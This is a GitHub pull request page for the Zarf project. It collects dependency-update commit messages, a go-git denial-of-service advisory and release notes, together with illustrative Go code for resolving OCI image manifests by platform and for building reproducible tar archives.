sigstore/cosign-installer@v3.1.0...v3.1.1

###
[`v3.1.0`](https://togithub.com/sigstore/cosign-installer/releases/tag/v3.1.0)

[Compare
Source](https://togithub.com/sigstore/cosign-installer/compare/v3.0.5...v3.1.0)

#### What's Changed

- update job to use latest action release by
[@&#8203;cpanato](https://togithub.com/cpanato) in
[https://github.com/sigstore/cosign-installer/pull/130](https://togithub.com/sigstore/cosign-installer/pull/130)
- Update action example for keyless signing as xarg is not required by
[@&#8203;jbtrystram](https://togithub.com/jbtrystram) in
[https://github.com/sigstore/cosign-installer/pull/132](https://togithub.com/sigstore/cosign-installer/pull/132)
- update examples by [@&#8203;cpanato](https://togithub.com/cpanato) in
[https://github.com/sigstore/cosign-installer/pull/133](https://togithub.com/sigstore/cosign-installer/pull/133)
- bump cosign to default to release v2.1.0 and update docs by
[@&#8203;cpanato](https://togithub.com/cpanato) in
[https://github.com/sigstore/cosign-installer/pull/136](https://togithub.com/sigstore/cosign-installer/pull/136)

#### New Contributors

- [@&#8203;jbtrystram](https://togithub.com/jbtrystram) made their first
contribution in
[https://github.com/sigstore/cosign-installer/pull/132](https://togithub.com/sigstore/cosign-installer/pull/132)

**Full Changelog**:
sigstore/cosign-installer@v3.0.5...v3.1.0

###
[`v3.0.5`](https://togithub.com/sigstore/cosign-installer/releases/tag/v3.0.5)

[Compare
Source](https://togithub.com/sigstore/cosign-installer/compare/v3.0.4...v3.0.5)

#### What's Changed

- download cosign releases from GitHub rather than GCS by
[@&#8203;bobcallaway](https://togithub.com/bobcallaway) in
[https://github.com/sigstore/cosign-installer/pull/126](https://togithub.com/sigstore/cosign-installer/pull/126)

**Full Changelog**:
sigstore/cosign-installer@v3.0.4...v3.0.5

###
[`v3.0.4`](https://togithub.com/sigstore/cosign-installer/releases/tag/v3.0.4)

[Compare
Source](https://togithub.com/sigstore/cosign-installer/compare/v3.0.3...v3.0.4)

- Include fix for
[https://github.com/sigstore/cosign-installer/pull/124](https://togithub.com/sigstore/cosign-installer/pull/124)
- changes download URL for `cosign` binary to github.com instead of GCS

###
[`v3.0.3`](https://togithub.com/sigstore/cosign-installer/releases/tag/v3.0.3)

[Compare
Source](https://togithub.com/sigstore/cosign-installer/compare/v3.0.2...v3.0.3)

##### What's Changed

- bump to cosign v2.0.2 by
[@&#8203;bobcallaway](https://togithub.com/bobcallaway) in
[https://github.com/sigstore/cosign-installer/pull/119](https://togithub.com/sigstore/cosign-installer/pull/119)
- changes download URL for `cosign` binary to github.com instead of GCS

**Full Changelog**:
sigstore/cosign-installer@v3.0.2...v3.0.3

###
[`v3.0.2`](https://togithub.com/sigstore/cosign-installer/releases/tag/v3.0.2)

[Compare
Source](https://togithub.com/sigstore/cosign-installer/compare/v3.0.1...v3.0.2)

##### What's Changed

- add --yes to example workflow by
[@&#8203;sebhoss](https://togithub.com/sebhoss) in
[https://github.com/sigstore/cosign-installer/pull/110](https://togithub.com/sigstore/cosign-installer/pull/110)
- Fix aarch64 action run by
[@&#8203;ananos](https://togithub.com/ananos) in
[https://github.com/sigstore/cosign-installer/pull/113](https://togithub.com/sigstore/cosign-installer/pull/113)
- Bump actions/checkout from 3.3.0 to 3.4.0 by
[@&#8203;dependabot](https://togithub.com/dependabot) in
[https://github.com/sigstore/cosign-installer/pull/115](https://togithub.com/sigstore/cosign-installer/pull/115)
- Bump actions/setup-go from 3.5.0 to 4.0.0 by
[@&#8203;dependabot](https://togithub.com/dependabot) in
[https://github.com/sigstore/cosign-installer/pull/114](https://togithub.com/sigstore/cosign-installer/pull/114)
- Bump actions/checkout from 3.4.0 to 3.5.0 by
[@&#8203;dependabot](https://togithub.com/dependabot) in
[https://github.com/sigstore/cosign-installer/pull/116](https://togithub.com/sigstore/cosign-installer/pull/116)
- default cosign to v2.0.1 by
[@&#8203;cpanato](https://togithub.com/cpanato) in
[https://github.com/sigstore/cosign-installer/pull/117](https://togithub.com/sigstore/cosign-installer/pull/117)
- changes download URL for `cosign` binary to github.com instead of GCS

##### New Contributors

- [@&#8203;sebhoss](https://togithub.com/sebhoss) made their first
contribution in
[https://github.com/sigstore/cosign-installer/pull/110](https://togithub.com/sigstore/cosign-installer/pull/110)
- [@&#8203;ananos](https://togithub.com/ananos) made their first
contribution in
[https://github.com/sigstore/cosign-installer/pull/113](https://togithub.com/sigstore/cosign-installer/pull/113)

**Full Changelog**:
sigstore/cosign-installer@v3...v3.0.2

###
[`v3.0.1`](https://togithub.com/sigstore/cosign-installer/releases/tag/v3.0.1)

[Compare
Source](https://togithub.com/sigstore/cosign-installer/compare/v3.0.0...v3.0.1)

##### What's Changed

- make cosign v2.0.0 default version by
[@&#8203;developer-guy](https://togithub.com/developer-guy) in
[https://github.com/sigstore/cosign-installer/pull/109](https://togithub.com/sigstore/cosign-installer/pull/109)
- changes download URL for `cosign` binary to github.com instead of GCS

**Full Changelog**:
sigstore/cosign-installer@v3.0.0...v3.0.1

### [`v3.0.0`](https://togithub.com/sigstore/cosign-installer/releases/tag/v3.0.0)

[Compare
Source](https://togithub.com/sigstore/cosign-installer/compare/v2.8.1...v3.0.0)

##### Breaking change

Cosign v2 has some breaking changes. Please check those:
https://blog.sigstore.dev/cosign-2-0-released/

##### What's Changed

- test: add logs when downloading the public keys by
[@&#8203;hectorj2f](https://togithub.com/hectorj2f) in
[https://github.com/sigstore/cosign-installer/pull/106](https://togithub.com/sigstore/cosign-installer/pull/106)
- Add support to install v2 and any other cosign release candidate by
[@&#8203;hectorj2f](https://togithub.com/hectorj2f) in
[https://github.com/sigstore/cosign-installer/pull/105](https://togithub.com/sigstore/cosign-installer/pull/105)
- v2.0.0 release by [@&#8203;sabre1041](https://togithub.com/sabre1041)
in
[https://github.com/sigstore/cosign-installer/pull/108](https://togithub.com/sigstore/cosign-installer/pull/108)
- changes download URL for `cosign` binary to github.com instead of GCS

##### New Contributors

- [@&#8203;hectorj2f](https://togithub.com/hectorj2f) made their first
contribution in
[https://github.com/sigstore/cosign-installer/pull/106](https://togithub.com/sigstore/cosign-installer/pull/106)
- [@&#8203;sabre1041](https://togithub.com/sabre1041) made their first
contribution in
[https://github.com/sigstore/cosign-installer/pull/108](https://togithub.com/sigstore/cosign-installer/pull/108)

**Full Changelog**:
sigstore/cosign-installer@v2...v3.0.0

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR has been generated by [Mend
Renovate](https://www.mend.io/free-developer-tools/renovate/). View
repository job log
[here](https://developer.mend.io/github/defenseunicorns/zarf).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNC4xNTMuMiIsInVwZGF0ZWRJblZlciI6IjM3Ljg3LjIiLCJ0YXJnZXRCcmFuY2giOiJtYWluIn0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
…by digest (#2204)

## Description

Update the release workflow for the sigstore update.

## Related Issue

Fixes #N/A

## Type of change

- [ ] Bug fix (non-breaking change which fixes an issue)
- [ ] New feature (non-breaking change which adds functionality)
- [X] Other (security config, docs update, etc)

## Checklist before merging

- [X] Test, docs, adr added or updated as needed
- [X] [Contributor Guide
Steps](https://github.com/defenseunicorns/zarf/blob/main/CONTRIBUTING.md#developer-workflow)
followed
## Description

Small fix for signing in the release workflow

## Related Issue

Fixes #N/A

## Type of change

- [ ] Bug fix (non-breaking change which fixes an issue)
- [ ] New feature (non-breaking change which adds functionality)
- [X] Other (security config, docs update, etc)

## Checklist before merging

- [X] Test, docs, adr added or updated as needed
- [X] [Contributor Guide
Steps](https://github.com/defenseunicorns/zarf/blob/main/CONTRIBUTING.md#developer-workflow)
followed
## Description

When using Zarf's OCI client: `OrasRemote`, there is backwards
compatibility to support previous package references. Old packages were
published under image manifests, while new packages are published under
image indexes. Resolving the manifest stored within an image index
requires knowing which os/arch (`ocispec.Platform`) to search for.

All internal usages of this client properly use the `oci.WithArch` or
`oci.WithPlatform` modifiers that add a `targetPlatform` to the client
so that `r.ResolveRoot` is able to properly leverage
`oras.ResolveOptions` and locate the correct manifest within the index.

However, if no platform modifier is used, `targetPlatform` remains
`nil`. This causes `oras.Resolve` to return the descriptor of the index,
not the manifest. To remedy this, simply error after the backwards
compat check if no modifier was used to add a `targetPlatform` onto the
remote client.

## Type of change

- [x] Bug fix (non-breaking change which fixes an issue)
- [ ] New feature (non-breaking change which adds functionality)
- [ ] Other (security config, docs update, etc)

## Checklist before merging

- [ ] Test, docs, adr added or updated as needed
- [x] [Contributor Guide
Steps](https://github.com/defenseunicorns/zarf/blob/main/CONTRIBUTING.md#developer-workflow)
followed

Signed-off-by: razzle <[email protected]>
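The resolve-or-fail behaviour this commit message describes, as an added illustration rather than Zarf's own `OrasRemote` code: a client that carries an optional `targetPlatform`, returns a legacy image-manifest descriptor as-is, selects the matching manifest from an image index when a platform was set, and fails outright when the reference is an index but no platform option was used. The `Platform`, `Descriptor`, `Index` and `Remote` types, `WithPlatform`, `ResolveRoot` and the digests are stand-ins defined inline so it runs without oras-go or the image-spec module.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
)

// Inline stand-ins for the OCI image-spec types (ocispec.Platform, Descriptor,
// Index); assumed here so the example has no external dependencies.
const (
	MediaTypeImageIndex    = "application/vnd.oci.image.index.v1+json"
	MediaTypeImageManifest = "application/vnd.oci.image.manifest.v1+json"
)

type Platform struct {
	Architecture string `json:"architecture"`
	OS           string `json:"os"`
}

type Descriptor struct {
	MediaType string    `json:"mediaType"`
	Digest    string    `json:"digest"`
	Size      int64     `json:"size"`
	Platform  *Platform `json:"platform,omitempty"`
}

type Index struct {
	SchemaVersion int          `json:"schemaVersion"`
	MediaType     string       `json:"mediaType"`
	Manifests     []Descriptor `json:"manifests"`
}

// Remote is a hypothetical client (not Zarf's OrasRemote) holding the one piece
// of state that matters here: the platform attached by a WithPlatform-style option.
type Remote struct{ targetPlatform *Platform }

type Option func(*Remote)

func WithPlatform(p Platform) Option { return func(r *Remote) { r.targetPlatform = &p } }

func NewRemote(opts ...Option) *Remote {
	r := &Remote{}
	for _, o := range opts {
		o(r)
	}
	return r
}

var ErrNoTargetPlatform = errors.New("reference is an image index but no target platform was set")

// ResolveRoot takes the descriptor a registry returned for a reference plus its
// raw body. Legacy (manifest-rooted) packages pass through unchanged; for an
// index-rooted package a platform is mandatory, and the absence of one is an
// error instead of silently handing back the index descriptor.
func (r *Remote) ResolveRoot(root Descriptor, content []byte) (Descriptor, error) {
	switch root.MediaType {
	case MediaTypeImageManifest:
		return root, nil
	case MediaTypeImageIndex:
		if r.targetPlatform == nil {
			return Descriptor{}, ErrNoTargetPlatform
		}
		var idx Index
		if err := json.Unmarshal(content, &idx); err != nil {
			return Descriptor{}, fmt.Errorf("decoding image index: %w", err)
		}
		for _, m := range idx.Manifests {
			if m.Platform != nil && m.Platform.OS == r.targetPlatform.OS &&
				m.Platform.Architecture == r.targetPlatform.Architecture {
				return m, nil
			}
		}
		return Descriptor{}, fmt.Errorf("no manifest for %s/%s in index %s",
			r.targetPlatform.OS, r.targetPlatform.Architecture, root.Digest)
	default:
		return Descriptor{}, fmt.Errorf("unsupported root media type %q", root.MediaType)
	}
}

// Constructed digests for the sample index below; not real package digests.
const (
	LinuxAmd64Digest = "sha256:1111111111111111111111111111111111111111111111111111111111111111"
	LinuxArm64Digest = "sha256:2222222222222222222222222222222222222222222222222222222222222222"
	IndexDigest      = "sha256:3333333333333333333333333333333333333333333333333333333333333333"
)

// SampleIndex builds a two-platform image index and the descriptor a registry
// would return for it (constructed sample data).
func SampleIndex() (Descriptor, []byte) {
	idx := Index{SchemaVersion: 2, MediaType: MediaTypeImageIndex, Manifests: []Descriptor{
		{MediaType: MediaTypeImageManifest, Digest: LinuxAmd64Digest, Size: 1024, Platform: &Platform{OS: "linux", Architecture: "amd64"}},
		{MediaType: MediaTypeImageManifest, Digest: LinuxArm64Digest, Size: 1024, Platform: &Platform{OS: "linux", Architecture: "arm64"}},
	}}
	content, _ := json.Marshal(idx)
	return Descriptor{MediaType: MediaTypeImageIndex, Digest: IndexDigest, Size: int64(len(content))}, content
}

func main() {
	root, content := SampleIndex()
	_, err := NewRemote().ResolveRoot(root, content)
	fmt.Println("no platform option:", err)
	d, err := NewRemote(WithPlatform(Platform{OS: "linux", Architecture: "arm64"})).ResolveRoot(root, content)
	fmt.Println("linux/arm64:", d.Digest, err)
}
```

The check sits after the media-type switch on purpose: a manifest-rooted legacy package must still resolve without a platform, so the error only fires on the index path where the platform actually decides which manifest is meant.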
…ntainerd/containerd to v1.7.11 [security] (#2209)

[![Mend
Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [github.com/go-git/go-git/v5](https://togithub.com/go-git/go-git) | `v5.10.1` -> `v5.11.0` | [![age](https://developer.mend.io/api/mc/badges/age/go/github.com%2fgo-git%2fgo-git%2fv5/v5.11.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://developer.mend.io/api/mc/badges/adoption/go/github.com%2fgo-git%2fgo-git%2fv5/v5.11.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://developer.mend.io/api/mc/badges/compatibility/go/github.com%2fgo-git%2fgo-git%2fv5/v5.10.1/v5.11.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/go/github.com%2fgo-git%2fgo-git%2fv5/v5.10.1/v5.11.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) |

---

> [!WARNING]
> Some dependencies could not be looked up. Check the Dependency
Dashboard for more information.

### GitHub Vulnerability Alerts

#### [CVE-2023-49568](https://togithub.com/go-git/go-git/security/advisories/GHSA-mw99-9chc-xw7r)

### Impact
A denial of service (DoS) vulnerability was discovered in go-git
versions prior to `v5.11`. This vulnerability allows an attacker to
perform denial of service attacks by providing specially crafted
responses from a Git server which triggers resource exhaustion in
`go-git` clients.

Applications using only the in-memory filesystem supported by `go-git`
are not affected by this vulnerability.
This is a `go-git` implementation issue and does not affect the upstream
`git` cli.

### Patches
Users running versions of `go-git` from `v4` and above are recommended
to upgrade to `v5.11` in order to mitigate this vulnerability.

### Workarounds
In cases where a bump to the latest version of `go-git` is not possible,
we recommend limiting its use to only trust-worthy Git servers.

## Credit
Thanks to Ionut Lalu for responsibly disclosing this vulnerability to
us.

### References
- [GHSA-mw99-9chc-xw7r](https://togithub.com/go-git/go-git/security/advisories/GHSA-mw99-9chc-xw7r)

---

### Release Notes

<details>
<summary>go-git/go-git (github.com/go-git/go-git/v5)</summary>

### [`v5.11.0`](https://togithub.com/go-git/go-git/releases/tag/v5.11.0)

[Compare
Source](https://togithub.com/go-git/go-git/compare/v5.10.1...v5.11.0)

#### What's Changed

- git: validate reference names
([#&#8203;929](https://togithub.com/go-git/go-git/issues/929)) by
[@&#8203;aymanbagabas](https://togithub.com/aymanbagabas) in
[https://github.com/go-git/go-git/pull/950](https://togithub.com/go-git/go-git/pull/950)
- git: stop iterating at oldest shallow when pulling. Fixes
[#&#8203;305](https://togithub.com/go-git/go-git/issues/305) by
[@&#8203;dhoizner](https://togithub.com/dhoizner) in
[https://github.com/go-git/go-git/pull/939](https://togithub.com/go-git/go-git/pull/939)
- plumbing: object, enable renames in getFileStatsFromFilePatches by
[@&#8203;djmoch](https://togithub.com/djmoch) in
[https://github.com/go-git/go-git/pull/941](https://togithub.com/go-git/go-git/pull/941)
- storage: filesystem, Add option to set a specific FS for alternates by
[@&#8203;pjbgf](https://togithub.com/pjbgf) in
[https://github.com/go-git/go-git/pull/953](https://togithub.com/go-git/go-git/pull/953)
- Align worktree validation with upstream and remove build warnings by
[@&#8203;pjbgf](https://togithub.com/pjbgf) in
[https://github.com/go-git/go-git/pull/958](https://togithub.com/go-git/go-git/pull/958)

#### New Contributors

- [@&#8203;dhoizner](https://togithub.com/dhoizner) made their first
contribution in
[https://github.com/go-git/go-git/pull/939](https://togithub.com/go-git/go-git/pull/939)
- [@&#8203;djmoch](https://togithub.com/djmoch) made their first
contribution in
[https://github.com/go-git/go-git/pull/941](https://togithub.com/go-git/go-git/pull/941)

**Full Changelog**:
go-git/go-git@v5.10.1...v5.11.0

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR has been generated by [Mend
Renovate](https://www.mend.io/free-developer-tools/renovate/). View
repository job log
[here](https://developer.mend.io/github/defenseunicorns/zarf).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy4xMDMuMSIsInVwZGF0ZWRJblZlciI6IjM3LjEwMy4xIiwidGFyZ2V0QnJhbmNoIjoibWFpbiJ9-->

---------

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: Wayne Starr <[email protected]>
[![Mend
Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [github.com/defenseunicorns/syft](https://togithub.com/defenseunicorns/syft) | replace | digest | `562ba66` -> `4d4b502` |

---

> [!WARNING]
> Some dependencies could not be looked up. Check the Dependency
Dashboard for more information.

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Enabled.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR has been generated by [Mend
Renovate](https://www.mend.io/free-developer-tools/renovate/). View
repository job log
[here](https://developer.mend.io/github/defenseunicorns/zarf).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy44Ny4yIiwidXBkYXRlZEluVmVyIjoiMzcuODcuMiIsInRhcmdldEJyYW5jaCI6Im1haW4ifQ==-->

---------

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: Wayne Starr <[email protected]>
[![Mend
Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [github.com/anchore/clio](https://togithub.com/anchore/clio) | require | digest | `767f622` -> `3e50431` |

---

> [!WARNING]
> Some dependencies could not be looked up. Check the Dependency
Dashboard for more information.

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Enabled.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR has been generated by [Mend
Renovate](https://www.mend.io/free-developer-tools/renovate/). View
repository job log
[here](https://developer.mend.io/github/defenseunicorns/zarf).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy4xMDMuMSIsInVwZGF0ZWRJblZlciI6IjM3LjEwMy4xIiwidGFyZ2V0QnJhbmNoIjoibWFpbiJ9-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
…2206)

[![Mend
Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [github.com/anchore/stereoscope](https://togithub.com/anchore/stereoscope) | require | digest | `4b999b7` -> `590920d` |

---

> [!WARNING]
> Some dependencies could not be looked up. Check the Dependency
Dashboard for more information.

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Enabled.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR has been generated by [Mend
Renovate](https://www.mend.io/free-developer-tools/renovate/). View
repository job log
[here](https://developer.mend.io/github/defenseunicorns/zarf).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy4xMDMuMSIsInVwZGF0ZWRJblZlciI6IjM3LjEwMy4xIiwidGFyZ2V0QnJhbmNoIjoibWFpbiJ9-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
[![Mend
Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [github/codeql-action](https://togithub.com/github/codeql-action) | action | major | `v2.22.9` -> `v3.22.12` |

---

> [!WARNING]
> Some dependencies could not be looked up. Check the Dependency
Dashboard for more information.

---

### Release Notes

<details>
<summary>github/codeql-action (github/codeql-action)</summary>

### [`v3.22.12`](https://togithub.com/github/codeql-action/compare/v3.22.11...v3.22.12)

[Compare Source](https://togithub.com/github/codeql-action/compare/v3.22.11...v3.22.12)

### [`v3.22.11`](https://togithub.com/github/codeql-action/compare/v2.22.11...v3.22.11)

[Compare Source](https://togithub.com/github/codeql-action/compare/v2.22.12...v3.22.11)

### [`v2.22.12`](https://togithub.com/github/codeql-action/compare/v2.22.11...v2.22.12)

[Compare Source](https://togithub.com/github/codeql-action/compare/v2.22.11...v2.22.12)

### [`v2.22.11`](https://togithub.com/github/codeql-action/compare/v2.22.10...v2.22.11)

[Compare Source](https://togithub.com/github/codeql-action/compare/v2.22.10...v2.22.11)

### [`v2.22.10`](https://togithub.com/github/codeql-action/compare/v2.22.9...v2.22.10)

[Compare Source](https://togithub.com/github/codeql-action/compare/v2.22.9...v2.22.10)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR has been generated by [Mend
Renovate](https://www.mend.io/free-developer-tools/renovate/). View
repository job log
[here](https://developer.mend.io/github/defenseunicorns/zarf).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy44Ny4yIiwidXBkYXRlZEluVmVyIjoiMzcuMTAzLjEiLCJ0YXJnZXRCcmFuY2giOiJtYWluIn0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
## Description

- Fix make target `lint-packages-and-examples`
- Remove `-skeleton` references
- Some small variable renaming + spelling fixes

## Type of change

- [x] Bug fix (non-breaking change which fixes an issue)
- [ ] New feature (non-breaking change which adds functionality)
- [x] Other (security config, docs update, etc)

## Checklist before merging

- [x] Test, docs, adr added or updated as needed
- [x] [Contributor Guide
Steps](https://github.com/defenseunicorns/zarf/blob/main/CONTRIBUTING.md#developer-workflow)
followed

---------

Signed-off-by: razzle <[email protected]>
Co-authored-by: Wayne Starr <[email protected]>
## Description

`archiver@v3` does not expose the functionality needed to create
tarballs with file headers containing only deterministic information. As
such, back to back package `create`s against the same data will result
in differences in SHAs of `components/*.tar` and `sboms.tar`.

To remedy this, tarballing up these directories manually is the only
current path forward in order to guarantee reproducibility.
`archiver@v4` contains such functionality, but is still in `alpha`.

## Related Issue

Fixes #2199 

## Type of change

- [ ] Bug fix (non-breaking change which fixes an issue)
- [x] New feature (non-breaking change which adds functionality)
- [ ] Other (security config, docs update, etc)

## Checklist before merging

- [ ] Test, docs, adr added or updated as needed
- [x] [Contributor Guide
Steps](https://github.com/defenseunicorns/zarf/blob/main/CONTRIBUTING.md#developer-workflow)
followed

---------

Signed-off-by: razzle <[email protected]>
Co-authored-by: Wayne Starr <[email protected]>
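The reproducibility requirement from this commit message, shown with Go's standard `archive/tar` as an added example (not Zarf's implementation, and not `archiver`): `WriteTar` walks a directory in sorted order and, in deterministic mode, pins every header field that `tar.FileInfoHeader` fills from the filesystem but that is not content (`ModTime`, `AccessTime`, `ChangeTime`, uid/gid, user and group names), so the archive bytes and therefore its SHA depend only on paths, permission bits and file contents. The non-deterministic mode is kept alongside to show how timestamps alone make the digest drift between back-to-back runs. The function names and the `deterministic` flag are choices made here.

```go
package main

import (
	"archive/tar"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"io"
	"io/fs"
	"os"
	"path/filepath"
	"sort"
	"time"
)

// WriteTar tars the tree under root into w. With deterministic=true the entry
// order is fixed and the volatile header fields are pinned; with false the
// headers are written exactly as tar.FileInfoHeader populates them.
func WriteTar(root string, w io.Writer, deterministic bool) error {
	var paths []string
	err := filepath.WalkDir(root, func(p string, d fs.DirEntry, err error) error {
		if err != nil {
			return err
		}
		if p != root {
			paths = append(paths, p)
		}
		return nil
	})
	if err != nil {
		return err
	}
	// WalkDir is already lexical; sorting makes the order independent of the walker.
	sort.Strings(paths)

	tw := tar.NewWriter(w)
	for _, p := range paths {
		info, err := os.Lstat(p)
		if err != nil {
			return err
		}
		if !info.Mode().IsRegular() && !info.IsDir() {
			return fmt.Errorf("%s: only regular files and directories are handled in this example", p)
		}
		hdr, err := tar.FileInfoHeader(info, "")
		if err != nil {
			return err
		}
		rel, err := filepath.Rel(root, p)
		if err != nil {
			return err
		}
		hdr.Name = filepath.ToSlash(rel) // root-relative, slash-separated, like the on-disk layout
		if info.IsDir() {
			hdr.Name += "/"
		}
		if deterministic {
			hdr.ModTime = time.Unix(0, 0).UTC() // epoch; the value itself is arbitrary but fixed
			hdr.AccessTime = time.Time{}        // zero so no PAX atime/ctime records are emitted
			hdr.ChangeTime = time.Time{}
			hdr.Uid, hdr.Gid = 0, 0
			hdr.Uname, hdr.Gname = "", ""
			hdr.Format = tar.FormatPAX // fixed format so the writer cannot choose differently per run
		}
		if err := tw.WriteHeader(hdr); err != nil {
			return err
		}
		if info.Mode().IsRegular() {
			f, err := os.Open(p)
			if err != nil {
				return err
			}
			_, err = io.Copy(tw, f)
			f.Close()
			if err != nil {
				return err
			}
		}
	}
	return tw.Close()
}

// TarDigest is the hex SHA-256 of the stream WriteTar produces; in deterministic
// mode this is the value that must match across repeated `create`s of the same data.
func TarDigest(root string, deterministic bool) (string, error) {
	h := sha256.New()
	if err := WriteTar(root, h, deterministic); err != nil {
		return "", err
	}
	return hex.EncodeToString(h.Sum(nil)), nil
}

func main() {
	if len(os.Args) != 2 {
		fmt.Fprintln(os.Stderr, "usage: dettar <dir>")
		os.Exit(2)
	}
	sum, err := TarDigest(os.Args[1], true)
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	fmt.Println(sum)
}
```

Permission bits still feed into the header, so the same tree created under a different umask will hash differently; that is a property of the content model, not of the writer, and is usually what you want for a package whose file modes matter at deploy time.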
[![Mend
Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [github.com/anchore/clio](https://togithub.com/anchore/clio) | require | digest | `3e50431` -> `89e2fe8` |

---

> [!WARNING]
> Some dependencies could not be looked up. Check the Dependency
Dashboard for more information.

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Enabled.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR has been generated by [Mend
Renovate](https://www.mend.io/free-developer-tools/renovate/). View
repository job log
[here](https://developer.mend.io/github/defenseunicorns/zarf).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy4xMjEuMCIsInVwZGF0ZWRJblZlciI6IjM3LjEyMS4wIiwidGFyZ2V0QnJhbmNoIjoibWFpbiJ9-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
@jbrewer3 jbrewer3 requested a review from jeff-mccoy as a code owner January 6, 2024 02:15
@github-advanced-security

This pull request sets up GitHub code scanning for this repository. Once the scans have completed and the checks have passed, the analysis results for this pull request branch will appear on this overview. Once you merge this pull request, the 'Security' tab will show more code scanning analysis results (for example, for the default branch). Depending on your configuration and choice of analysis tool, future pull requests will be annotated with code scanning analysis results. For more information about GitHub code scanning, check out the documentation.

@jbrewer3 jbrewer3 requested review from Madeline-UX and a team as code owners January 6, 2024 02:15

netlify bot commented Jan 6, 2024

Deploy Preview for zarf-docs canceled.

Name Link
🔨 Latest commit 193314b
🔍 Latest deploy log https://app.netlify.com/sites/zarf-docs/deploys/6598b7b7c9b1ff00083abfe4

@Racer159

Racer159 commented Jan 6, 2024

closing as not necessary

@Racer159 Racer159 closed this Jan 6, 2024